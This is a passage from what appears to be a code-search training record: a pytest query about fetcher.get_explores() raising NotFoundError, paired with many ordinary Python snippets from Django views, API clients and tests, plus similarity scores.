post__users=[factories.UserFactory(unit_name=\"b_unite\"), user],\n urgency_level=models.ReferralUrgency.objects.get(\n duration=timedelta(days=1)\n ),\n ),\n ]\n\n self.setup_elasticsearch()\n response = self.client.get(\n f\"/api/referrallites/?user={user.id}&sort=users_unit_name_sorting&sort_dir=asc\",\n HTTP_AUTHORIZATION=f\"Token {Token.objects.get_or_create(user=user)[0]}\",\n )\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json()[\"count\"], 2)\n self.assertEqual(response.json()[\"results\"][0][\"id\"], referrals[0].id)\n self.assertEqual(response.json()[\"results\"][1][\"id\"], referrals[1].id)", "def do_fetch(self):\n pass", "def list(self, request):\n exp = Experiment.objects.all()\n serializer = ExperimentSerializer(exp, many=True)\n return send_response(request.method, serializer)", "def test_view_telescope_night(self):\n telescope_name = 'super_big_telescope'\n instrument_name = 'awesome_instrument'\n create_exposures(telescope_name, instrument_name, 2013, 8, 5)\n create_exposures(telescope_name, instrument_name, 2013, 8, 6)\n create_exposures(telescope_name, instrument_name, 2013, 8, 7)\n expected_exposures = [\n '<Exposure: %s 2013/08/06 run 1>' % telescope_name,\n '<Exposure: %s 2013/08/06 run 2>' % telescope_name,\n ]\n response = self.client.get(reverse(\n 'observations:night', args=('super_big_telescope','2013','8','6')))\n self.assertQuerysetEqual(response.context['exposure_list'], \n expected_exposures)", "def _orgWithLogoQuery(model, program):\n q = model.all()\n q.filter('scope', program)\n q.filter('status', 'active')\n q.filter('logo_url >=', '')\n\n return q", "def test_get_filtered_list_limit(self):\n flexmock(errata).should_receive(\"Advisory\").and_return(None)\n\n response = flexmock(status_code=200)\n response.should_receive(\"json\").and_return(test_structures.example_erratum_filtered_list)\n\n flexmock(errata.requests).should_receive(\"get\").and_return(response)\n\n res = errata.get_filtered_list(limit=1)\n self.assertEqual(1, len(res))", "def test_list_filtering(self):\n # Test the \"all\" response.\n url = '/api/users/?all=true'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, self.contract_user.email)\n self.assertContains(response, self.del_user.email)\n self.assertContains(response, self.shared.email)\n # Test filtering by ad_deleted.\n url = '/api/users/?ad_deleted=true'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, self.del_user.email)\n self.assertNotContains(response, self.user1.email)\n url = '/api/users/?ad_deleted=false'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertNotContains(response, self.del_user.email)\n self.assertContains(response, self.user1.email)\n # Test filtering by email (should return only one object).\n url = '/api/users/?email={}'.format(self.user1.email)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n j = response.json()\n self.assertEqual(len(j['objects']), 1)\n self.assertContains(response, self.user1.email)\n self.assertNotContains(response, self.user2.email)\n # Test filtering by GUID (should return only one object).\n url = '/api/users/?ad_guid={}'.format(self.user1.ad_guid)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n j = response.json()\n self.assertEqual(len(j['objects']), 1)\n self.assertContains(response, self.user1.email)\n self.assertNotContains(response, self.user2.email)\n # Test filtering by cost centre (should return all, inc. inactive and contractors).\n url = '/api/users/?cost_centre={}'.format(self.cc2.code)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, self.user2.email)\n self.assertContains(response, self.contract_user.email)\n self.assertContains(response, self.del_user.email)\n self.assertNotContains(response, self.user1.email)\n self.assertNotContains(response, self.shared.email) # Belongs to CC1.\n # Test filtering by O365 licence status.\n self.user1.o365_licence = True\n self.user1.save()\n url = '/api/users/?o365_licence=true'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, self.user1.email)\n self.assertNotContains(response, self.user2.email)", "def query(self):\r\n records = self.input()\r\n if self.to_investigate:\r\n records = self.investigate(records)\r\n post.log.info(\"Caching {} records for {}\".format(len(records), self.name))\r\n self.cache_records(records)", "def get_model_queryset(model, request=None):\n if request:\n preview_draft = ('preview' in request.GET and 'draft' in request.GET)\n edit_mode = ('edit' in request.GET or request.session.get('cms_edit', False))\n if preview_draft or edit_mode: \n return model.objects.drafts()\n # Default case / moderator is used but there is no request\n return model.objects.public()", "def get_recommendations(self, hashes, limit=5):\n response = self.fetch(\"/recommend\", {\n \"num\": limit,\n }, method=\"POST\", body=self.encode_feed_hashes(hashes))\n\n return response", "def fetch_gene_descriptions(self, metrics, coeff='cohen', nih_fetch_num=20, alpha=.05, **kwargs):\n if 'verbose' not in kwargs:\n kwargs['verbose'] = True\n if 'nih_dl' not in kwargs:\n kwargs['nih_dl'] = False\n\n if kwargs['nih_dl'] == False:\n if 'csv_path' not in kwargs:\n raise ValueError(\"'csv_path' argument in **kwargs missing; provide argument or use 'nih_dl':True .\")\n\n top_genes = []\n if coeff == 'cohen':\n # Checking if users mixed up coeff/metric parameters\n if isinstance(metrics, list):\n raise ValueError(\"list passed with coeff='cohen'; if you want to use Spearman's Rho use coeff='spearman'.\")\n\n for rec in metrics['results'][:nih_fetch_num]:\n try:\n if kwargs['nih_dl']:\n gene_name, gene_description = gene_info(str(rec.entrez))\n else:\n gene_dat = get_local_gene_info(kwargs['csv_path'], [rec.entrez])\n gene_name = gene_dat[0].name\n gene_description = gene_dat[0].description\n top_genes.append((rec.entrez, rec.cohen_d, rec.p_value, gene_name, gene_description))\n except IndexError:\n continue\n\n if kwargs['verbose']:\n print \"\\nCorrected Bonferroni Alpha: %.3E\\n\\n\" % (alpha / float(metrics['gene_sample_size']))\n for eid, coh_d, p_val, gene_i, descr in top_genes:\n if len(descr) == 1:\n print \"%d (p = %.3E; d = %.3f): < No description found >\\n\\n\" % (eid, p_val, coh_d)\n else:\n print \"%d (p = %.3E; d = %.3f): %s\\n\\n\" % (eid, p_val, coh_d, descr)\n elif coeff == 'spearman':\n # Checking if users mixed up coeff/metric parameters\n if isinstance(metrics, dict):\n raise ValueError(\"dict passed with coeff='spearman'; if you want to use Cohen's d use coeff='cohen'.\")\n\n top_ids = np.argsort(metrics)[:nih_fetch_num]\n\n top_rs = [r for r in reversed(np.sort(metrics))][:nih_fetch_num]\n top_genes = []\n for x in xrange(len(top_ids)):\n try:\n if kwargs['nih_dl']:\n gene_name, gene_description = gene_info(str(top_ids[x]))\n else:\n gene_dat = get_gene_info(kwargs['csv_path'], [top_ids[x]])\n gene_name = gene_dat[0].name\n gene_description = gene_dat[0].description\n top_genes.append((int(top_ids[x]), top_rs[x], gene_name, gene_description))\n except IndexError:\n continue\n\n if kwargs['verbose']:\n print \"\\nCorrected Bonferroni Alpha: %.3E\\n\\n\" % (alpha/float(len(self.no.ge.keys())))\n for eid, rho, gene_i, descr in top_genes:\n if len(descr) == 1:\n print \"%d (r = %.3f): < No description found >\\n\\n\" % (eid, rho)\n else:\n print \"%d (r = %.3f): %s\\n %s\\n\\n\" % (eid, rho, gene_i, descr)\n\n else:\n raise ValueError(\"Invalid parameter value for 'coeff'; use 'spearman' or 'cohen'.\")\n\n return top_genes", "def _extract_articles(self, target):\n feed_response, modified, etag = self._get_recent_feed(target)\n\n # Bozo is a tag which tells that the RSS hasn't been parsed correctly.\n if feed_response.bozo:\n exc = feed_response.bozo_exception\n if not isinstance(exc, self.ALLOWED_EXCEPTIONS):\n raise exc\n\n articles = []\n count = 0\n if self._manage_status(feed_response, target):\n for feed_entry in feed_response.entries:\n if self._limit and count >= self._limit:\n logging.info(\n \"Crawling limit of %d article(s) was reached for this target.\",\n count\n )\n break\n try:\n article = self.extract_article(feed_entry, target)\n except Exception as exc:\n # NOTE(cmiN): On Stackdriver Error Reporting we don't want to catch\n # (with `logging.exception`) \"Not Found\" errors, because they are\n # pretty frequent and usual, therefore ignore-able.\n log_function = (\n logging.error if \"404\" in str(exc) else logging.exception\n )\n log_function(\"Got %s while parsing %r.\", exc, feed_entry.id)\n else:\n articles.append(article)\n count += 1\n target.checkpoint(modified, etag)\n\n return articles", "def getItems(self): \n \n kwargs = {}\n kwargs[\"max\"] = {\"deals.mocality.co.ke\" : 1, \"www.zetu.co.ke\":1, \"manual\":2}\n from frontpage import get_deals\n items = get_deals(self.context, self.request, **kwargs)\n return items", "def step_filter(self, qs):\n return qs", "def get_history_promotion(request):\n response = ApiJsonResponse()\n try:\n user = MyUser.objects.get(pk=request.user.pk)\n except ObjectDoesNotExist:\n return Response({\n \"msg\": _('MSG_USER_NOT_EXIST'),\n \"status\": 404\n }, status=404)\n try:\n coupons = Coupon.objects.filter(user=user, distributed=True)\n except ObjectDoesNotExist:\n response.set_data(\"[]\")\n response.set_result_code(200)\n response.set_result_msg(\"MSG_PROMOTIONS_NOT_FOUNDED\")\n return JsonResponse(response.get_dict())\n favorite = False\n user_actions = None\n for coupon in coupons:\n favorite = False\n try:\n Favorite.objects.get(promotion=coupon.promotion, user=user)\n favorite = True\n except ObjectDoesNotExist:\n pass\n try:\n user_actions = UserSocialAction.objects.get(promotion=coupon.promotion, user=user)\n except ObjectDoesNotExist:\n pass\n# if coupon.promotion.end_date < timezone.now():\n response.set_multiples_data(serialize_promotion_object(coupon.promotion, favorite, user_actions))\n response.set_result_code(200)\n response.set_result_msg(\"MSG_PROMOTIONS_FOUNDED\")\n return JsonResponse(response.get_dict())", "def explore_all_nf_data():\n request = app.current_request\n resource_type = request.query_params[\"resource_type\"]\n offset = int(request.query_params[\"offset\"])\n limit = int(request.query_params[\"limit\"])\n explorer = UnogsExplorer(resource_type)\n success = explorer.explore(limit, offset)\n return {\"success\": success}", "def filter(self, skip_cache=True, **lookup_vars):\n\n url = self.get_collection_url(**lookup_vars)\n\n if skip_cache:\n cached_response = None\n else:\n cached_response = self.get_from_cache('GET', url)\n\n if cached_response:\n response = cached_response\n else: \n response = self._request('GET', url)\n\n self.validate_collection_response(response)\n\n serializer = self.get_serializer()\n r_data = serializer.deserialize(to_unicode(response.content))\n collection_field = self.model._meta.get('collection_field')\n if collection_field and collection_field in r_data:\n obj_list = r_data[collection_field]\n\n extra_data = r_data.copy()\n del(extra_data[collection_field])\n\n else:\n obj_list = r_data\n extra_data = {}\n\n if obj_list:\n try:\n obj_list[0].keys\n except (KeyError, AttributeError):\n raise ValueError('expected list of dictionaries')\n\n resource_list = [self.model(**obj_dict) for obj_dict in obj_list]\n\n if not skip_cache:\n self.cache_response(response)\n\n return ListWithAttributes(resource_list, extra_data)", "def candidates_for(self, model, exclude_recipients=None,\n exclude_keywords=None):\n querysets = import_string(settings.INTERLINK_QUERYSETS)\n candidates = querysets.relevant_objects(model)\n\n keywords = [\n self.available_keywords_of(objects, donor=model,\n exclude_recipients=exclude_recipients,\n exclude_keywords=exclude_keywords)\n for objects in candidates\n ]\n return islice(idiverse(keywords), settings.INTERLINK_LINKS_PER_PAGE)", "def query_fetch(self, **kwargs):\n return iterate_with_exp_backoff(self._client.query(**kwargs).fetch())", "def queryset(self, request: 'HttpRequest', queryset: 'QuerySet') -> 'QuerySet':\n queryset = queryset.annotate(citation_count=Count('images'))\n if self.value() == 'Yes':\n return queryset.exclude(citation_count__lt=2)\n if self.value() == 'No':\n return queryset.filter(citation_count__gte=2)", "def _load_enriched_results(self):\n return super().load_results()", "def test_get_filtered_list(self):\n flexmock(errata).should_receive(\"Advisory\").and_return(None)\n\n response = flexmock(status_code=200)\n response.should_receive(\"json\").and_return(test_structures.example_erratum_filtered_list)\n\n flexmock(errata.requests).should_receive(\"get\").and_return(response)\n\n res = errata.get_filtered_list()\n self.assertEqual(2, len(res))", "def queryset(self, request):\n qs = super(ShortURLAdmin, self).queryset(request)\n if request.user.has_perm('deflect.list_all'):\n return qs\n return qs.filter(creator=request.user)", "def get_examinee():\n try:\n user_id = authenticate_token(request)\n examiner = is_examiner(user_id)\n getting_own_results = is_self(user_id)\n if examiner or getting_own_results:\n results_query = db.session.query(User, func.count(ExamRecording.user_id)).\\\n outerjoin(ExamRecording, ExamRecording.user_id==User.user_id).\\\n group_by(User.user_id)\n\n results, next_page_exists = filter_results(results_query, User)\n users = []\n for u, er_count in results:\n users.append({\n **u.to_dict(),\n 'exam_recordings':er_count\n })\n return jsonify({'users':users, 'next_page_exists':next_page_exists}), 200\n \n return jsonify({'user_id': user_id, 'message': ['access denied, not examiner']}), 403\n except (Exception, exc.SQLAlchemyError) as e:\n print(traceback.format_exc())\n return jsonify({ 'message': e.args }), 500", "def test_search_collection_filters():\n col = Collection(search='forest', object_type=['layer'], filters={'provider': 'gee'}, app=['gfw'])\n assert len(col) > 1", "def get_exposure(exposure_id,b_mean,b_sd,c_mean,c_sd,non_rate,dist_type,mortalities):#id in db\n\te_id \t\t= int(long(exposure_id))\n\texposure_outcomes = DBHelper.exposure_outcome\n\toutcome_ids \t= DBHelper.exposure_outcome.get(e_id)\n\n\tsamples_rr \t= DBHelper.samples_rr.get(e_id)\n\tsamples_pop \t= DBHelper.samples_pop.get(e_id)\n\trisks \t\t= DBHelper.risks.get(e_id)\n\tmeasure \t= DBHelper.measures.get(e_id)\n\tdist_type \t= get_dist_type(e_id)\n\n\t#get population distribution \n\tpopDistribution = PopDistribution(DBHelper.age_group_num,non_rate,b_mean,b_sd,c_mean,c_sd,samples_pop,dist_type)\n\n\t#get outcomes\n\toutcomes = []\n\tfor o_id in outcome_ids:\n\t\t# mortality\n\t\tm_mortality = mortalities.get(2*o_id)\n\t\tf_mortality = mortalities.get(2*o_id+1)\n\t\t# risks\n\t\tm_risks = risks.get(2*o_id)\n\t\tf_risks = risks.get(2*o_id+1)\n\t\t# outcome name\n\t\tname = DBHelper.get_outcome_name(o_id)\n\t\t# limit estimates\n\t\tlle = DBHelper.exposure_outcome.get(e_id).get(o_id)[0]\n\t\tule = DBHelper.exposure_outcome.get(e_id).get(o_id)[1]\n\t\t# outcome\n\t\toutcome = PrimeOutcome(name,o_id,m_mortality,f_mortality,samples_rr,m_risks,f_risks,lle,ule,measure,e_id) \n\t\toutcomes.append(outcome)\n\n\texposure = PrimeExposure(mortalities,outcome_ids,samples_rr,samples_pop,outcomes,popDistribution)\n\treturn exposure" ]
[ "0.753411", "0.6666877", "0.6630365", "0.63271785", "0.6167889", "0.5833313", "0.55136293", "0.53865874", "0.53228235", "0.53056663", "0.5212486", "0.51720136", "0.51571435", "0.5055647", "0.50480455", "0.50150645", "0.49779034", "0.49160555", "0.49039322", "0.4895284", "0.4848704", "0.482605", "0.4824581", "0.48242378", "0.48210782", "0.48201323", "0.48130566", "0.4805133", "0.47655815", "0.47494656", "0.4748037", "0.47258034", "0.47196138", "0.4702308", "0.4702295", "0.46926677", "0.46888262", "0.46794218", "0.46759364", "0.46718252", "0.46692136", "0.46690103", "0.46681648", "0.46630797", "0.4658287", "0.46438962", "0.46365693", "0.46320397", "0.46316645", "0.4623911", "0.46210995", "0.46198216", "0.46181902", "0.46176514", "0.46171588", "0.4613754", "0.46083638", "0.46080238", "0.46070036", "0.4604151", "0.46038383", "0.46026015", "0.46025363", "0.4599809", "0.45964685", "0.45910552", "0.4580324", "0.4575527", "0.45733407", "0.45683867", "0.45666835", "0.4564399", "0.4561746", "0.45587906", "0.45431003", "0.45412165", "0.45402902", "0.453899", "0.45350116", "0.45307642", "0.45288593", "0.45278725", "0.45203403", "0.45135424", "0.4511145", "0.45065355", "0.4503953", "0.4498469", "0.4493937", "0.44903862", "0.44896066", "0.44882566", "0.44840655", "0.44787923", "0.4477653", "0.4473649", "0.4467357", "0.44672474", "0.4465248", "0.4462996" ]
0.822642
0
fetcher.get_explores() should throw if an explore/model is not found.
def test_get_explores_throws_if_model_or_explore_does_not_exist( fc: fetcher.Fetcher, model: Optional[str], explore: Optional[str], msg: str ): with pytest.raises(exceptions.NotFoundError) as exc: fc.get_explores(model=model, explore=explore) assert msg in str(exc.value)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_explores(fc: fetcher.Fetcher):\n explores = fc.get_explores()\n assert isinstance(explores, list)\n assert len(explores) > 0\n assert isinstance(explores[0], models.LookmlModelExplore)", "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores = fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def test_get_unused_explores(fc: fetcher.Fetcher, test_model, test_unused_explores):\n unused_explores = fc.get_unused_explores(model=test_model[\"name\"])\n assert all(e in test_unused_explores for e in unused_explores)", "def test_get_explore_fields_gets_fields_for_dimension_or_measure_only_explores(\n fc: fetcher.Fetcher, test_model, test_dimensions_or_measures_only_explores\n):\n expected = test_dimensions_or_measures_only_explores[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=expected[\"name\"])\n assert isinstance(explore, list)\n actual = explore[0]\n assert actual.name == expected[\"name\"]\n assert not (actual.fields.dimensions and actual.fields.measures)\n expected_fields = [f[\"name\"] for f in expected[\"fields\"]]\n actual_fields = fc.get_explore_fields(actual)\n assert actual_fields == expected_fields", "def test_get_explore_fields_gets_fields(\n fc: fetcher.Fetcher, test_model, test_explores_stats\n):\n test_explore = test_explores_stats[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=test_explore[\"name\"])\n assert isinstance(explore, list)\n explore = explore[0]\n assert isinstance(explore, models.LookmlModelExplore)\n assert explore.model_name == test_model[\"name\"]\n assert explore.name == test_explore[\"name\"]\n fields = fc.get_explore_fields(explore)\n assert isinstance(fields, list)\n assert fields == test_explore[\"all_fields\"]", "def get_all_explorations():\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_all()]", "def test_get_explore_field_stats(\n fc: fetcher.Fetcher,\n looker_sdk: methods.Looker40SDK,\n test_model,\n test_used_explore_names,\n test_explores_stats,\n):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=test_used_explore_names[0]\n )[0]\n actual_stats = fc.get_explore_field_stats(explore)\n assert isinstance(actual_stats, dict)\n\n for e in test_explores_stats:\n if e[\"name\"] == test_used_explore_names[0]:\n expected_stats = e\n\n assert all(actual_stats[k] == 0 for k in expected_stats[\"unused_fields\"])\n assert all(actual_stats[k] > 0 for k in expected_stats[\"used_fields\"])", "def validate(self, mode: QueryMode = \"batch\") -> Dict[str, Any]:\n self._query_by_task_id = {}\n explore_count = self._count_explores()\n printer.print_header(\n f\"Testing {explore_count} \"\n f\"{'explore' if explore_count == 1 else 'explores'} \"\n f\"[{mode} mode] \"\n f\"[concurrency = {self.query_slots}]\"\n )\n\n self._create_and_run(mode)\n if mode == \"hybrid\" and self.project.errored:\n self._create_and_run(mode)\n\n for model in sorted(self.project.models, key=lambda x: x.name):\n for explore in sorted(model.explores, key=lambda x: x.name):\n message = f\"{model.name}.{explore.name}\"\n printer.print_validation_result(\n passed=not explore.errored, source=message\n )\n\n return self.project.get_results(mode)", "def fetch_gene_descriptions(self, metrics, coeff='cohen', nih_fetch_num=20, alpha=.05, **kwargs):\n if 'verbose' not in kwargs:\n kwargs['verbose'] = True\n if 'nih_dl' not in kwargs:\n kwargs['nih_dl'] = False\n\n if kwargs['nih_dl'] == False:\n if 'csv_path' not in kwargs:\n raise ValueError(\"'csv_path' argument in **kwargs missing; provide argument or use 'nih_dl':True .\")\n\n top_genes = []\n if coeff == 'cohen':\n # Checking if users mixed up coeff/metric parameters\n if isinstance(metrics, list):\n raise ValueError(\"list passed with coeff='cohen'; if you want to use Spearman's Rho use coeff='spearman'.\")\n\n for rec in metrics['results'][:nih_fetch_num]:\n try:\n if kwargs['nih_dl']:\n gene_name, gene_description = gene_info(str(rec.entrez))\n else:\n gene_dat = get_local_gene_info(kwargs['csv_path'], [rec.entrez])\n gene_name = gene_dat[0].name\n gene_description = gene_dat[0].description\n top_genes.append((rec.entrez, rec.cohen_d, rec.p_value, gene_name, gene_description))\n except IndexError:\n continue\n\n if kwargs['verbose']:\n print \"\\nCorrected Bonferroni Alpha: %.3E\\n\\n\" % (alpha / float(metrics['gene_sample_size']))\n for eid, coh_d, p_val, gene_i, descr in top_genes:\n if len(descr) == 1:\n print \"%d (p = %.3E; d = %.3f): < No description found >\\n\\n\" % (eid, p_val, coh_d)\n else:\n print \"%d (p = %.3E; d = %.3f): %s\\n\\n\" % (eid, p_val, coh_d, descr)\n elif coeff == 'spearman':\n # Checking if users mixed up coeff/metric parameters\n if isinstance(metrics, dict):\n raise ValueError(\"dict passed with coeff='spearman'; if you want to use Cohen's d use coeff='cohen'.\")\n\n top_ids = np.argsort(metrics)[:nih_fetch_num]\n\n top_rs = [r for r in reversed(np.sort(metrics))][:nih_fetch_num]\n top_genes = []\n for x in xrange(len(top_ids)):\n try:\n if kwargs['nih_dl']:\n gene_name, gene_description = gene_info(str(top_ids[x]))\n else:\n gene_dat = get_gene_info(kwargs['csv_path'], [top_ids[x]])\n gene_name = gene_dat[0].name\n gene_description = gene_dat[0].description\n top_genes.append((int(top_ids[x]), top_rs[x], gene_name, gene_description))\n except IndexError:\n continue\n\n if kwargs['verbose']:\n print \"\\nCorrected Bonferroni Alpha: %.3E\\n\\n\" % (alpha/float(len(self.no.ge.keys())))\n for eid, rho, gene_i, descr in top_genes:\n if len(descr) == 1:\n print \"%d (r = %.3f): < No description found >\\n\\n\" % (eid, rho)\n else:\n print \"%d (r = %.3f): %s\\n %s\\n\\n\" % (eid, rho, gene_i, descr)\n\n else:\n raise ValueError(\"Invalid parameter value for 'coeff'; use 'spearman' or 'cohen'.\")\n\n return top_genes", "def get(self, url_to_get=None): # pylint: disable=too-many-branches\n\n next_url = None\n if not url_to_get:\n url_to_get = self.url_to_get\n\n if self.etags and url_to_get in self.etags:\n self.headers[\"If-None-Match\"] = self.etags[url_to_get]\n\n req = get(url_to_get, headers=self.headers)\n\n if req.status_code == 200:\n data = req.json()\n repos = []\n\n if \"Etag\" in req.headers:\n self.etags[url_to_get] = req.headers[\"Etag\"]\n Helpers.Dict(self.etags).to_json(Settings.etags_file)\n\n if isinstance(data, list):\n repos.extend(data)\n else:\n raise Exception(\n \"Unable to understand GitHub API response for: '%s'.\" % url_to_get\n )\n\n if \"Link\" in req.headers:\n next_url = Helpers.Regex(\n req.headers[\"Link\"], self.regex_next_url, group=1, return_data=True\n ).match()\n\n if next_url:\n for element in self.get(url_to_get=next_url):\n if element[\"name\"] not in Settings.repo_to_ignore:\n yield element\n else:\n continue\n\n if repos:\n for element in repos:\n if element[\"name\"] not in Settings.repo_to_ignore:\n yield element\n else:\n continue\n\n elif req.status_code == 304:\n data = Helpers.Dict.from_json(\n Helpers.File(Settings.repositories_file).read()\n )\n\n for element in data:\n if element[\"name\"] not in Settings.repo_to_ignore:\n yield element\n else:\n continue\n elif req.status_code == 401:\n raise Exception(\"Bad GitHub credentials.\")\n else:\n raise Exception(\n \"Somethign went wrong while communicating with: '%s'.\" % url_to_get\n )", "def test_obtain_issues_http_error(self, mock_url_read):\n mock_url_read.side_effect = urllib.error.HTTPError('raise', None, None, None, None)\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def get_expenses(self, parameter=None):\n resp = zoho_http_client.get(base_url, self.details, self.headers, parameter)\n return parser.get_list(resp)", "def maybe_download():\n\n print(\"Downloading Inception 5h Model ...\")\n download.maybe_download_and_extract(url=data_url, download_dir=data_dir)", "def test_obtain_issues_no_query(self, mock_url_read):\n mock_url_read.side_effect = \\\n [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}', '<CxXMLResults />']\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def get_exploration_by_id(exploration_id, strict=True):\n exploration_memcache_key = _get_exploration_memcache_key(exploration_id)\n memcached_exploration = memcache_services.get_multi(\n [exploration_memcache_key]).get(exploration_memcache_key)\n\n if memcached_exploration is not None:\n return memcached_exploration\n else:\n exploration_model = exp_models.ExplorationModel.get(\n exploration_id, strict=strict)\n if exploration_model:\n exploration = exp_domain.Exploration(exploration_model)\n memcache_services.set_multi({\n exploration_memcache_key: exploration})\n return exploration\n else:\n return None", "async def get_model_evaluation(\n get_model_evaluation_request: DescriptionModels,\n token: str = Depends(oauth2_scheme),\n):\n try:\n logging.info(\"Calling /gcp/automl/get_model_evaluation endpoint\")\n logging.debug(f\"Request: {get_model_evaluation_request}\")\n if decodeJWT(token=token):\n response = ManageModelController().get_model_evaluation_controller(\n request=get_model_evaluation_request\n )\n return response\n else:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Invalid access token\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n except Exception as error:\n logging.error(f\"Error in /gcp/automl/get_model_evaluation endpoint: {error}\")\n raise error", "def _count_explores(self) -> int:\n explore_count = 0\n for model in self.project.models:\n explore_count += len(model.explores)\n return explore_count", "def test_obtain_issues(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=False, severity='High')]\n\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n\n self.assertIsInstance(issues, List)\n self.assertIsInstance(issues[0], Checkmarx.Issue)\n self.assertEqual('JScript Vulnerabilities', issues[0].group)\n self.assertEqual('Reflected XSS', issues[0].title)\n self.assertEqual('http://url/CxWebClient/ScanQueryDescription.aspx?queryID=789&'\n 'queryVersionCode=842956&queryTitle=Reflected_XSS', issues[0].display_url)\n self.assertEqual(1, issues[0].count)\n self.assertEqual(\"Recurrent\", issues[0].status)", "def get_exploits():\n results = {}\n for loader, name, ispkg in pkgutil.walk_packages(acsploit.exploits.__path__):\n m = loader.find_module(name).load_module(name)\n\n if not ispkg and hasattr(m, 'options') and hasattr(m, 'run'):\n exploit = name.replace('.', '/')\n results[exploit] = m\n\n return results", "def test_get_models_throws_if_model_does_not_exist(fc: fetcher.Fetcher, project, model):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_models(project=project, model=model)\n assert \"An error occured while getting models.\" in str(exc.value)", "def lookml_model_explore_with_http_info(self, lookml_model_name, explore_name, **kwargs):\n\n all_params = ['lookml_model_name', 'explore_name', 'fields']\n all_params.append('callback')\n all_params.append('_return_http_data_only')\n all_params.append('_preload_content')\n all_params.append('_request_timeout')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method lookml_model_explore\" % key\n )\n params[key] = val\n del params['kwargs']\n # verify the required parameter 'lookml_model_name' is set\n if ('lookml_model_name' not in params) or (params['lookml_model_name'] is None):\n raise ValueError(\"Missing the required parameter `lookml_model_name` when calling `lookml_model_explore`\")\n # verify the required parameter 'explore_name' is set\n if ('explore_name' not in params) or (params['explore_name'] is None):\n raise ValueError(\"Missing the required parameter `explore_name` when calling `lookml_model_explore`\")\n\n\n collection_formats = {}\n\n resource_path = '/lookml_models/{lookml_model_name}/explores/{explore_name}'.replace('{format}', 'json')\n path_params = {}\n if 'lookml_model_name' in params:\n path_params['lookml_model_name'] = params['lookml_model_name']\n if 'explore_name' in params:\n path_params['explore_name'] = params['explore_name']\n\n query_params = {}\n if 'fields' in params:\n query_params['fields'] = params['fields']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['application/json'])\n\n # Authentication setting\n auth_settings = []\n\n return self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='LookmlModelExplore',\n auth_settings=auth_settings,\n callback=params.get('callback'),\n _return_http_data_only=params.get('_return_http_data_only'),\n _preload_content=params.get('_preload_content', True),\n _request_timeout=params.get('_request_timeout'),\n collection_formats=collection_formats)", "def fetch_data():\n for category in CHEATSHEETS.items():\n subprocess.call(f'curl -o {PATH}{category[0] + \".csv\"} {category[1]}', shell=True)\n\n index = -1\n for filename in os.listdir(PATH):\n for idx, row in pd.read_csv(PATH + filename, on_bad_lines='skip').replace(np.nan, '').iterrows():\n name = row['Model']\n url = REDIRECT_URL + name.lower()\n category = filename.split('.')[0]\n featurizers = row['Acceptable Featurizers'].split(' ') if row['Acceptable Featurizers'] != '' else []\n backends = ['PyTorch' if item in {\"PTorch\", \"Torch\", \"PyTorch \"} else item for item in row['Backend'].split('/')]\n types = row['Type'] if filename != 'general.csv' else row['Classifier/Regressor']\n types = types.split('/') if filename == 'material.csv' else types.split('/ ')\n index += 1\n\n backend_list.append(backends)\n type_list.append(types)\n featurizer_list.append(featurizers)\n model_list.append(Model(name, url, category, featurizers, backends, types, index))", "def get_viewable_explorations(user_id):\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_viewable_explorations(user_id)]", "def unfound_entities(token, path='', file='result.csv', save=False, chunk_size=128):\n\n headers = {\n 'accept': 'text/csv',\n }\n\n try:\n response = requests.get(\n 'https://reactome.org/AnalysisService/download/%s/entities/notfound/%s' % (token, file),\n headers=headers)\n except ConnectionError as e:\n print(e)\n\n if response.status_code == 200:\n if save:\n with open(\"\".join([path, file]), 'wb') as f:\n for chunk in response.iter_content(chunk_size=chunk_size):\n f.write(chunk)\n else:\n gene_list = response.text.split('\\n')\n df_list = [row.split(\",\") for row in gene_list[:-1]]\n df = 